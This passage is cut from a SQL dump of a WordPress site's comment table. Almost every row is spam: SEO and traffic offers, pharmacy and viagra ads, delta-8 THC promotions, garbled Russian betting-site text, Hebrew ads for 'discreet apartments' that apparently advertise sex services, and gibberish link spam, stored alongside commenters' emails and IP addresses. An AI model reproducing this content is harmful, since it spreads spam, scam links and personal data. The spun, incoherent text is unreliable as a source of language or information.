22:48:18','Nice post. I learn something totally new and challenging on websites I stumbleupon everyday. It will always be interesting to read through content from other authors and use a little something from other sites. Anselma Donalt Ho',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2576,5410,'erotik','mona10550@gmail.com','https://filmkovasi.org/','45.128.246.208','2021-03-02 04:44:49','2021-03-02 04:44:49','You can definitely see your skills in the work you write. Melitta Udale Madalyn',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2581,5410,'erotik','rew3701@yandex.com','https://filmkovasi.org/','45.8.134.211','2021-03-02 07:32:14','2021-03-02 07:32:14','I was able to find good information from your articles. Bernadina Reece Aenea',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2605,5410,'ready tabs like viagra','rachelnijmeh@yahoo.com','https://filmmakinesi.pw/','45.134.187.193','2021-03-05 05:31:54','2021-03-05 05:31:54','Gary and I both have many fond memories of Wally. praying for your family in this difficult and time. Lily Weylin Stichter',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2606,5410,'sexy baccarat','shorey_nel@yahoo.com','https://filmmakinesi.pw/','138.128.106.187','2021-03-05 08:21:38','2021-03-05 08:21:38','Hiya, I am really glad I have found this info. Nowadays bloggers publish only about gossip and internet stuff and this is really frustrating. A good web site with interesting content, that is what I need. Thanks for making this website, and I will be visiting again. Do you do newsletters by email? Danit Thatch Cherry',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2681,4674,'Blanche Loewenthal','loewenthal.blanche2@gmail.com','','45.86.15.188','2021-03-14 11:44:01','2021-03-14 11:44:01','Hello\r\n \r\nYOU NEED QUALITY VISITORS FOR YOUR: tummyrevolution.com ?\r\n \r\nWE PROVIDE HIGH-QUALITY VISITORS WITH:\r\n- 100% safe for your site\r\n- real visitors with unique IPs. No bots, proxies, or datacenters\r\n- visitors from Search Engine (by keyword)\r\n- visitors from Social Media Sites (referrals)\r\n- visitors from any country you want (USA/UK/CA/EU…)\r\n- very low bounce rate\r\n- very long visit duration\r\n- multiple pages visited\r\n- tractable in google analytics\r\n- custom URL tracking provided\r\n- boost ranking in SERP, SEO, profit from CPM\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST HERE=> ventfara@mail.com\r\n \r\n \r\nThanks, Blanche Loewenthal',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(2687,4674,'Wilhelmina Wilfong','wilfong.wilhelmina@gmail.com','','45.130.255.86','2021-03-15 01:44:15','2021-03-15 01:44:15','Hello\r\n \r\nYOU NEED HELP TO BUILD SEO LINKS FOR: tummyrevolution.com ?\r\n \r\nI just checked out your website, and wanted to find out if you need help for SEO Link Building ?\r\n \r\nWE OFFER YOU THE BEST SEO STRATEGY FOR 2021.\r\n \r\nBuild an unlimited number of Backlinks and increase Traffic to your websites which will lead to a higher number of customers and much more sales for you. \r\n \r\nIf You Are Interested, I\'m waiting for your response here => seosubmitter@mail.com\r\n \r\n \r\nThanks, Wilhelmina Wilfong',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(2801,5125,'ixcdjbtkme','b815a004da6be8f6eabeb2cae520e7b8.roopert@ssemarketing.net','http://sclzzgqqpz','104.244.77.101','2021-03-24 07:13:12','2021-03-24 07:13:12','Muchas gracias. ?Como puedo iniciar sesion?',0,'0','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','comment',0,0),(2832,4674,'mvalolwopm','bd2782f29d88b0f9acbab7a18d2f9c82.roopert@ssemarketing.net','http://frxtffuhhe','5.199.130.188','2021-03-28 10:52:44','2021-03-28 10:52:44','Muchas gracias. ?Como puedo iniciar sesion?',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','comment',0,0),(3086,4659,'delta 8 carts Area 52','vedabroyles@gmail.com','https://tinyurl.com/yg7t6sou','107.152.246.159','2021-04-27 17:20:18','2021-04-27 17:20:18','That is a very good tip particularly to those new to the \r\nblogosphere. Short but very accurate info… Appreciate your sharing this one.\r\nA must read post!\r\n\r\ndelta 8 carts Area 52 - delta 8 carts Area 52\r\n\r\ndelta 8 carts Area 52 - delta 8 THC area 52\r\n\r\ndelta 8 THC for sale area 52 - buy delta 8 THC area 52\r\n\r\ndelta 8 carts Area 52 - delta 8 THC for sale area 52\r\n\r\ndelta 8 area 52 - Area 52 delta 8 carts',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; IE8Mercury; rv:11.0) like Gecko','comment',0,0),(3122,4659,'area 52 delta 8 THC products','joesph.cardin@freenet.de','https://tinyurl.com/yj8c2poz','192.241.64.91','2021-05-02 05:47:36','2021-05-02 05:47:36','Pretty! This was a really wonderful post. Many thanks for \r\nsupplying these details.\r\n\r\narea 52 delta 8 THC products - area 52 delta 8 THC products\r\n\r\narea 52 delta 8 THC products - buy delta 8 THC area 52\r\n\r\nbuy delta 8 THC area 52 - delta 8 carts Area 52\r\n\r\nbuy delta 8 THC area 52 - delta 8 THC for sale area 52\r\n\r\ndelta 8 THC area 52 - delta 8 THC area 52',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99','comment',0,0),(3185,4674,'Beatrice Kingsford','beatrice.kingsford@msn.com','','45.131.212.70','2021-05-09 05:24:28','2021-05-09 05:24:28','Thanks, Beatrice Kingsford for tummyrevolution.com',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(3635,4666,'https://www.songmanhits.com','Aylward@gmail.com','https://images.google.dj/url?q=https://www.songmanhits.com','23.106.24.192','2021-07-03 05:23:08','2021-07-03 05:23:08','Best view i have ever seen !',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','comment',0,0),(4044,4707,'Michaelanced','ghrtr4545v7@gmail.com','https://virtualbookmaker.ru/parimatch/125-vse-sposoby-popolnenija-scheta-v-parimatch.html','148.251.180.84','2021-09-01 23:17:04','2021-09-01 23:17:04','Плавно мы подошли к самому приятному разделу не исключительно около выборе букмекерской конторы, все и жизни в целом. Большое забота присутствие выборе магазинов мы уделяем бонусам и акциям. Впрочем в сфере ставок для спорт какойнибудь относятся негативно к бонусам, беспричинно недуманнонегаданно считают их способом заманивания тож огулом бесполезными. Связано это с тем, который ассортимент бонус имеет приманка условия: \r\n \r\nставки на киберспорт фонбет \r\n \r\nТакая противодействие связана с тем, сколько бонусы и акции не соответствуют манере игры для некоторых пользователей, в то сезон якобы чтобы других они не являются проблемой. Скажем, для получения бонуса вынужден собрать экспресс alias выбрать событие с минимальным коэффициентом 2,1, а пользователь отродясь не ставит выше 1,5, то чтобы него бонус довольно бесполезным. Однако дабы других он будет полезным и может стать фактором большого выигрыша. Опять одним способом поддержания активных игроков является меню лояльности. В данном случае ради ваш внешний счет начисляет барыш чрез общего выигрыша тож общей суммы депозита для давний месяц. Естественно, такая ведомость нацелена токмо на активных игроков и не подходит чтобы пользователей, которые ставят токмо для зрелище любимой команды. Стоит отметить, сколько некий недобросовестные компании используют привлекательные условия сообразно бонусам, чтобы привлечь новых пользователей. В этом случае нуждаться большое почтение уделить надежности букмекерской компании. Выбирая букмекерскую контору, величественно изучать бонусную программу и соглашаться на нее только ареопаг условии, что она подходит вашей манере игры. В противном случае добросовестный маршрут заработка приведет к печальным последствиям. Популярные БК используют собственные инструменты чтобы поощрения активных игроков и новичков, только самыми популярными и эффективными бонусами остаются удвоение депозита и получение фрибета (бесплатной ставки, в случае выигрыша вы получаете приз с вычетом суммы фрибета).',0,'0','Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.34 Safari/537.36 Edg/83.0.478.25','comment',0,0),(4047,4707,'WalterGed','grtrt34rr3443v7@gmail.com','https://legalbookmaker.ru/fonbet/262-prilozhenie-bukmekerskoj-kontory-fonbet-dlja-ios-igrajte-i-vyigryvajte.html','148.251.180.84','2021-09-02 02:42:07','2021-09-02 02:42:07','Каждая букмекерская контора устанавливает свои правила игры. Обычно присутствие регистрации компания просит прочитать подобающий пергамент и дать гармония с его содержимым. К сожалению, некоторый пользователи ставят галочку в чекбоксе и даже не открывают файл. Это опрометчиво, потому что в случае возникновения конфликтной ситуации вы не сможете оспорить свою точку зрения, ежели контора предупреждала вас прежде о «недопустимости определенных действий» или «что БК оставляет право ради собой». \r\n \r\nСледовательно мы рекомендуем неусыпно внимательно дружить с правилами зрелище для ставках. Это реально помогает избежать недоразумений в дальнейшем. \r\n \r\nэкспресс 1хставка \r\n \r\nИли уже было приказывать, у всех компаний домашний свод правил. Все употреблять и общие моменты, для которые стоит сделать журьба: \r\n \r\nлегальные БК регистрируют единственно совершеннолетних граждан. Для этого и существует обязательная идентификация и верификация документов, в ходе которой букмекер проверяет, который вы – настоящий человек и вам исполнилось 18 лет. \r\nроссийские беттинговые операторы, работающие всего в интернете, нередко создают учетную запись только гражданам РФ. Резиденты других стран могут делаться клиентами БК, если сам подтвердят законность проживания в стране в наземном пункте приема ставок (ППС), предъявив сотруднику компании билет и другие соответствующие документы. \r\nлегальные конторы заключают пари для реальные казна лишь в российских рублях. \r\nправила компании ни в коем случае не противоречат положениям федерального законодательства относительный азартных играх и ставках для спорт онлайн.',0,'0','Mozilla/5.0 (Windows NT 6.3; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36','comment',0,0),(4049,4707,'Dennissit','dfgretergfefergfgrt7@gmail.com','https://betting.moscow/parimatch/148-kak-otkryt-igrovoj-schet-v-bk-parimatch.html','148.251.180.84','2021-09-02 06:29:47','2021-09-02 06:29:47','Получая постоянные жалобы игроков для недобросовестных букмекеров, мы решили создать лучший рейтинг букмекерских сайтов. Хотелось справлять что-то особенное и полезное воеже сферы ставок – качественный и уникальный в своем роде букмекерский рейтинг, добропорядочный и безобидный, присутствие этом максимально незатейный и понятный. \r\n \r\nparimatch mobile \r\n \r\nТребования к интернет букмекерам у начинающих игроков и опытных беттеров обычно различаются. В частности, ради профессионала крайне гордо лояльное приказ к точный выигрывающим игрокам и высокие лимиты ставок, новички же больше обращают призор чтобы избыток интерфейса и наличие бонусов, поэтому наш рейтинг бк является универсальным решение и подойдет каждому игроку.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4100.3 Safari/537.36','comment',0,0),(4087,4674,'Horacio Benjamin','benjamin.horacio@hotmail.com','','192.126.162.83','2021-09-06 19:53:08','2021-09-06 19:53:08','You Want to Know What Is Link Building and How Does It Work ?\r\nYou Want to Know How to Get Powerful Backlinks ?\r\nCheck this out http://paxtonlrwa85295.bloggerbags.com/7836763/what-is-link-building-and-how-does-it-work',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(4281,4674,'Bernd Cambridge','bernd.cambridge@gmail.com','','168.81.13.16','2021-10-03 11:00:43','2021-10-03 11:00:43','GET PROFESSIONALLY VIDEOS AT AFFORDABLE PRICES\r\n\r\nWe offer professionally produced videos at affordable prices.\r\nOur videos have the look and feel of a high quality television commercial, complete with professional spokesperson, background, text, \r\nimages, logos, music and of course, most importantly, your company’s contact information for your tummyrevolution.com.\r\n\r\nIf you’re ready to reach more clients today, let us get to work on producing your company’s exclusive video.\r\nMORE INFO=> http://qejn39630.bloggerbags.com/8235141/get-videos-at-affordable-prices',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(5016,4652,'דירות דיסקרטיות בהרצליה','wfu7be@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','51.195.45.190','2021-12-18 05:18:47','2021-12-18 05:18:47','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.25','comment',0,0),(5017,4819,'דירות דיסקרטיות בהרצליה','ky8mpyy@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','185.220.101.22','2021-12-18 05:19:10','2021-12-18 05:19:10','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36','comment',0,0),(5018,4713,'דירות דיסקרטיות בהרצליה','8nkqwdr32i@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','185.17.121.250','2021-12-18 05:19:18','2021-12-18 05:19:18','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36','comment',0,0),(5019,4659,'דירות דיסקרטיות בהרצליה','wo39a05@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','185.220.101.55','2021-12-18 05:19:26','2021-12-18 05:19:26','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0','comment',0,0),(5020,5054,'דירות דיסקרטיות בהרצליה','p1zlzvlk@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','37.123.163.58','2021-12-18 05:19:33','2021-12-18 05:19:33','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0','comment',0,0),(5021,5060,'דירות דיסקרטיות בהרצליה','v90pxxqp@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','81.17.18.60','2021-12-18 05:19:42','2021-12-18 05:19:42','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36','comment',0,0),(5022,5354,'דירות דיסקרטיות בהרצליה','k18t6gv@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','185.220.101.28','2021-12-18 05:19:49','2021-12-18 05:19:49','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36','comment',0,0),(5023,5352,'דירות דיסקרטיות בהרצליה','smc2w5@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','51.195.45.190','2021-12-18 05:20:15','2021-12-18 05:20:15','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.53 Safari/533.4','comment',0,0),(5024,5410,'דירות דיסקרטיות בהרצליה','tl6fwg@gmail.com','https://israelnightclub.com/apartments/דירות-דיסקרטיות-בהרצליה/','185.220.103.9','2021-12-18 05:20:22','2021-12-18 05:20:22','אין ספק כי גברים רבים בישראל ובעולם כולו זקוקים לפתרון זמין, נגיש ומהיר השפעה שיתן להם מענה דירות דיסקרטיות בראשון לציון',0,'0','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.53 Safari/533.4','comment',0,0),(5094,4652,'דירות דיסקרטיות בבת ים','elgy80@gmail.com','https://www.israelxclub.co.il/girls-cat/דירות-דיסקרטיות-בבת-ים/','185.220.101.165','2021-12-25 06:23:30','2021-12-25 06:23:30','אין אונות דירות דיסקרטיות בתל אביב',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37','comment',0,0),(5120,4756,'uznacarnumemi','adijoli@pazew.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2021-12-27 04:12:17','2021-12-27 04:12:17','Ehilecij Ojtaku ucv.exkt.tummyrevolution.com.npf.tf http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5181,4652,'דירות דיסקרטיות בקרית שמונה','et5pqeo@gmail.com','https://israelnightclub.com/','185.220.101.181','2021-12-30 19:10:52','2021-12-30 19:10:52','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','comment',0,0),(5182,4819,'דירות דיסקרטיות בקרית שמונה','vsovco@gmail.com','https://israelnightclub.com/','185.220.101.30','2021-12-30 19:11:01','2021-12-30 19:11:01','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','comment',0,0),(5183,4713,'דירות דיסקרטיות בקרית שמונה','51npw2xaux@gmail.com','https://israelnightclub.com/','185.220.101.172','2021-12-30 19:11:08','2021-12-30 19:11:08','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','comment',0,0),(5184,4659,'דירות דיסקרטיות בקרית שמונה','k9pe35u6u@gmail.com','https://israelnightclub.com/','202.165.228.225','2021-12-30 19:11:18','2021-12-30 19:11:18','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','comment',0,0),(5185,5054,'דירות דיסקרטיות בקרית שמונה','s74i5vbqi@gmail.com','https://israelnightclub.com/','89.58.19.2','2021-12-30 19:11:30','2021-12-30 19:11:30','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','comment',0,0),(5186,5060,'דירות דיסקרטיות בקרית שמונה','pnt5zvf3@gmail.com','https://israelnightclub.com/','95.216.145.1','2021-12-30 19:11:37','2021-12-30 19:11:37','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','comment',0,0),(5187,5354,'דירות דיסקרטיות בקרית שמונה','rg1u09@gmail.com','https://israelnightclub.com/','185.220.102.4','2021-12-30 19:11:45','2021-12-30 19:11:45','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MASMJS; rv:11.0) like Gecko','comment',0,0),(5188,5352,'דירות דיסקרטיות בקרית שמונה','k7wvo6gixa@gmail.com','https://israelnightclub.com/','209.141.53.99','2021-12-30 19:12:21','2021-12-30 19:12:21','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MASMJS; rv:11.0) like Gecko','comment',0,0),(5189,5410,'דירות דיסקרטיות בקרית שמונה','yvhqhyb@gmail.com','https://israelnightclub.com/','185.220.102.240','2021-12-30 19:12:27','2021-12-30 19:12:27','נכון להיום, ישנם מספר סוגים של מוצרי קמגרה שניתן לרכוש בארץ. דירות דיסקרטיות באשקלון',0,'0','Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/24.0','comment',0,0),(5228,2132,'etuwasili','oqezuv@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-01-03 18:03:06','2022-01-03 18:03:06','http://slkjfdf.net/ - Uzareece Ickeyayba dmi.mlzs.tummyrevolution.com.ypv.ng http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5230,2132,'ifvigix','acadakq@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-01-03 18:18:40','2022-01-03 18:18:40','http://slkjfdf.net/ - Ocuqifip Obehone uuq.dodq.tummyrevolution.com.zkf.qx http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5231,2132,'ifeiabala','lameemiln@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-01-03 18:31:15','2022-01-03 18:31:15','http://slkjfdf.net/ - Odebud Uaxiyax icc.lqvv.tummyrevolution.com.fuo.kx http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5232,2132,'utormeka','uciavoti@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-01-03 18:46:23','2022-01-03 18:46:23','http://slkjfdf.net/ - Upilihu Osojeqox tjs.lxib.tummyrevolution.com.xxd.yq http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42','comment',0,0),(5261,2290,'osiuosin','rrodoile@ayosd.sibicomail.com','http://slkjfdf.net/','45.80.104.247','2022-01-05 18:20:10','2022-01-05 18:20:10','http://slkjfdf.net/ - Umevepazu Iajoxaf kxo.xtrc.tummyrevolution.com.lnu.xm http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49','comment',0,0),(5281,4652,'דירות דיסקרטיות בהרצליה','tia7gfjr3c@gmail.com','https://loveroom.co.il/room/דירות-דיסקרטיות-בהרצליה/','185.220.101.11','2022-01-06 20:45:24','2022-01-06 20:45:24','בעיות אין אונות בת ים',0,'0','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0','comment',0,0),(5348,4666,'anouiqaji','omazeved@icapi.sibicomail.com','http://slkjfdf.net/','5.181.168.78','2022-01-13 07:33:20','2022-01-13 07:33:20','http://slkjfdf.net/ - Ogilaf Afwoduraz txj.vsei.tummyrevolution.com.odd.xc http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5354,4666,'guhpaqea','oruogef@egiuz.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-01-13 14:07:05','2022-01-13 14:07:05','Iterar Awocce eol.czxd.tummyrevolution.com.ume.cz http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5355,4666,'awiwoxreza','uvibiba@egiuz.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-01-13 14:13:44','2022-01-13 14:13:44','Kesoxerat Oyanue rce.sait.tummyrevolution.com.zpt.ez http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(5356,4666,'ibacirupeoa','uafuxouod@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-01-13 14:36:09','2022-01-13 14:36:09','http://slkjfdf.net/ - Eibivat Elovaj pmm.yxmd.tummyrevolution.com.phc.er http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5357,4666,'ilorefotop','edawel@omofu.fodiscomail.com','http://slkjfdf.net/','62.210.127.188','2022-01-13 14:58:32','2022-01-13 14:58:32','http://slkjfdf.net/ - Apocikqen Ekqorap uvf.mvvk.tummyrevolution.com.vrd.qv http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5358,4666,'idurawawi','oriadi@pazew.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-01-13 15:17:40','2022-01-13 15:17:40','Eiholipak Awaqelow yoc.nnkl.tummyrevolution.com.lar.br http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5486,5354,'Bobbyvop','aswcfrbgk@yandex.com','https://disvaiza.mystrikingly.com/','46.161.11.11','2022-01-23 17:14:07','2022-01-23 17:14:07','online drugstore buy viagra pharmacy 100mg \r\ncanada drugs pharmacy online national pharmacies \r\ncanadian prescriptions online https://disvaiza.mystrikingly.com/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36','comment',0,0),(5739,2126,'imgeuuzuva','agiiqi@egiuz.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-12 15:05:34','2022-02-12 15:05:34','Ipubeyu Ehuneh cmu.ymcg.tummyrevolution.com.rye.lr http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5740,2126,'arareoxipubos','aqelabvok@egiuz.fodiscomail.com','http://slkjfdf.net/','62.210.178.249','2022-02-12 15:16:32','2022-02-12 15:16:32','Geusuh Ipacubh meo.kpzj.tummyrevolution.com.ikz.zp http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49','comment',0,0),(5744,2126,'obvidaroo','ulohoda@orxot.sibicomail.com','http://slkjfdf.net/','185.61.220.137','2022-02-12 18:06:23','2022-02-12 18:06:23','http://slkjfdf.net/ - Itugay Isonow nre.bick.tummyrevolution.com.erl.ve http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36','comment',0,0),(5747,2126,'awehoqinrupi','olohesen@natke.letiasmail.com','http://slkjfdf.net/','178.159.100.31','2022-02-12 21:54:42','2022-02-12 21:54:42','http://slkjfdf.net/ - Odakexivo Aepewuif tto.wwfy.tummyrevolution.com.vbt.ew http://slkjfdf.net/',0,'0','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) 